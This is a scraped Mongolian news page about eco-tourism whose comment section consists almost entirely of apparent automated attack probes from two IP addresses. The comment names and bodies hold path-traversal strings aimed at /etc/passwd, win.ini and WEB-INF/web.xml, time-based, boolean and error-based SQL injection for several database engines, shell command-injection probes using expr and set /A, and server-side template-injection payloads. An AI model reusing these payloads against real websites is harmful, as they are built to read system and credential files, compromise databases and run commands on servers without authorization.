Монгол Улсад эко аялал жуулчлал хөгжүүлэхэд хамгийн боломжтой

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-07 11:08:30
Холбоотой мэдээ
Сэтгэгдлүүд
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',19)='l 185.234.72.114 53 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',0)='v 185.234.72.114 53 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:19 185.234.72.114 53 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 53 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(19))::text>'0 185.234.72.114 53 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 53 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 53 өдөр

  123456
 • admin"and(select*from(select+sleep(19))a/**/union/**/select+1)=" 185.234.72.114 53 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 53 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 53 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 53 өдөр

  123456
 • admin'and(select*from(select+sleep(19))a/**/union/**/select+1)=' 185.234.72.114 53 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 53 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 53 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 53 өдөр

  123456
 • admin"and"t"="y 185.234.72.114 53 өдөр

  123456
 • admin"and"g"="g 185.234.72.114 53 өдөр

  123456
 • admin'and'n'='s 185.234.72.114 53 өдөр

  123456
 • admin'and'n'='n 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',19)='v
 • admin 185.234.72.114 53 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m
 • admin 185.234.72.114 53 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('r',19)
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('k',0)
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:19
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:19'/**/
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(19))::text>'0
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(19))>0/**/
 • admin 185.234.72.114 53 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 53 өдөр

  123456"and(select*from(select+sleep(19))a/**/union/**/select+1)="
 • admin 185.234.72.114 53 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 53 өдөр

  123456'and(select*from(select+sleep(19))a/**/union/**/select+1)='
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  (select*from(select+sleep(19)union/**/select+1)a)
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • %u2215etc%u2215passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • /etc/passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456"and"f"="x
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456"and"t"="t
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 53 өдөр

  123456
 • expr 897646633 + 941313480 185.234.72.114 53 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and't'='c
 • admin&set /A 976085585+945963375 185.234.72.114 53 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  '-var_dump(md5(785156986))-'
 • admin 185.234.72.114 53 өдөр

  123456'and'o'='o
 • admin$(expr 823537861 + 849671442) 185.234.72.114 53 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  ${@var_dump(md5(873411768))};
 • admin|expr 875053009 + 891729703 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and+2=7
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and+3=3
 • admin expr 962324794 + 991306573 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • /*1*/{{968788504+823840841}} 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  expr 820616022 + 954141094
 • ${836207971+999166633} 185.234.72.114 53 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 53 өдөр

  123456
 • fugllzcqvtqkvupjfgoe 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456&set /A 953066064+965548994
 • admin 185.234.72.114 53 өдөр

  123456
 • '-var_dump(md5(603127280))-' 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456$(expr 817728315 + 846118789)
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456|expr 826787451 + 907808156
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  ${885915116+913189088}
 • ${@var_dump(md5(725988740))}; 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  fugllzcqvtqkvupjfgoe
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456 expr 870936153 + 933656153
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',10)='l
 • admin 194.163.191.42 54 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
 • admin 194.163.191.42 54 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('a',10)
 • admin 194.163.191.42 54 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('c',0)
 • admin 194.163.191.42 54 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:10
 • admin 194.163.191.42 54 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 54 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:10'/**/
 • admin 194.163.191.42 54 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 54 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(10))::text>'0
 • admin 194.163.191.42 54 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 54 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(10))>0/**/
 • admin 194.163.191.42 54 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 54 өдөр

  123456"and(select*from(select+sleep(10))a/**/union/**/select+1)="
 • admin 194.163.191.42 54 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 54 өдөр

  123456'and(select*from(select+sleep(10))a/**/union/**/select+1)='
 • admin 194.163.191.42 54 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 54 өдөр

  (select*from(select+sleep(10)union/**/select+1)a)
 • admin 194.163.191.42 54 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456"and"y"="x
 • ../../../../WEB-INF/web.xml 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456"and"n"="n
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456'and'a'='m
 • ../../../WEB-INF/web.xml 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456'and'c'='c
 • ../../WEB-INF/web.xml;admin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456/**/and+0=7
 • ../../WEB-INF/web.xml 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456/**/and+0=0
 • ../WEB-INF/web.xml;admin 194.163.191.42 54 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 54 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 54 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 54 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 54 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 54 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 54 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 54 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 54 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 54 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 54 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 54 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 54 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 54 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 54 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 54 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 54 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',10)='s 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  expr 956687721 + 856409088
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',0)='o 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456&set /A 843612303+832487681
 • admin'and(select+1)>0waitfor/**/delay'0:0:10 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456$(expr 842814595 + 893242917)
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456|expr 977730027 + 969463607
 • admin'"\( 194.163.191.42 54 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(10))::text>'0 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456 expr 953091808 + 818299059
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 54 өдөр

  123456
 • <%- 818904214+902101701 %> 194.163.191.42 54 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 54 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 54 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 54 өдөр

  123456
 • #set($c=944565947+809525568)${c}$c 194.163.191.42 54 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1336733500')))>'0 194.163.191.42 54 өдөр

  123456
 • admin"and(select*from(select+sleep(10))a/**/union/**/select+1)=" 194.163.191.42 54 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 54 өдөр

  123456
 • ${(896647145+884127629)?c} 194.163.191.42 54 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1324310786'))) 194.163.191.42 54 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 54 өдөр

  123456
 • ${811781360+816951414} 194.163.191.42 54 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 54 өдөр

  123456
 • admin/**/and/**/cast(md5('1660053175')as/**/int)>0 194.163.191.42 54 өдөр

  123456
 • admin'and(select*from(select+sleep(10))a/**/union/**/select+1)=' 194.163.191.42 54 өдөр

  123456
 • /*1*/{{958572601+921580810}} 194.163.191.42 54 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 54 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 54 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1101946260)as/**/int))>'0 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  <%- 819637945+921426849 %>
 • extractvalue(1,concat(char(126),md5(1686816042))) 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • /etc/passwd 194.163.191.42 54 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1005392008)))and" 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  #set($c=831138856+804938299)${c}$c
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 54 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1873788670)))and' 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  '-var_dump(md5(324985579))-'
 • admin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456'"\(
 • admin 194.163.191.42 54 өдөр

  ${(913692235+877531178)?c}
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 54 өдөр

  ${@var_dump(md5(781135014))};
 • admin"and"l"="z 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  ${808991740+822499298}
 • ./../../../../../../etc/passwd 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1603796446')))>'0
 • ../../../../../../etc/passwdadmin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1351161944')))
 • admin 194.163.191.42 54 өдөр

  /*1*/{{903842356+901010286}}
 • admin 194.163.191.42 54 өдөр

  123456/**/and/**/cast(md5('1020583215')as/**/int)>0
 • admin 194.163.191.42 54 өдөр

  123456'and(select'1'from/**/cast(md5(1337227071)as/**/int))>'0
 • admin 194.163.191.42 54 өдөр

  extractvalue(1,concat(char(126),md5(1979806069)))
 • ../../../../../../etc/passwd 194.163.191.42 54 өдөр

  123456
 • admin"and"e"="e 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1544060962)))and"
 • admin'and'r'='f 194.163.191.42 54 өдөр

  123456
 • expr 856141516 + 955972724 194.163.191.42 54 өдөр

  123456
 • admin'and'e'='e 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1474063768)))and'
 • admin&set /A 925121338+860165205 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 54 өдөр

  123456
 • admin$(expr 950472419 + 807961916) 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • qluasxyiwzoltroicmpk 194.163.191.42 54 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 54 өдөр

  123456
 • ${861234298+931209588} 194.163.191.42 54 өдөр

  123456
 • admin|expr 861336273 + 889039056 194.163.191.42 54 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • '-var_dump(md5(392428235))-' 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  ${883410147+885952797}
 • admin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  qluasxyiwzoltroicmpk
 • ${@var_dump(md5(144626986))}; 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • admin expr 983753999 + 840536298 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456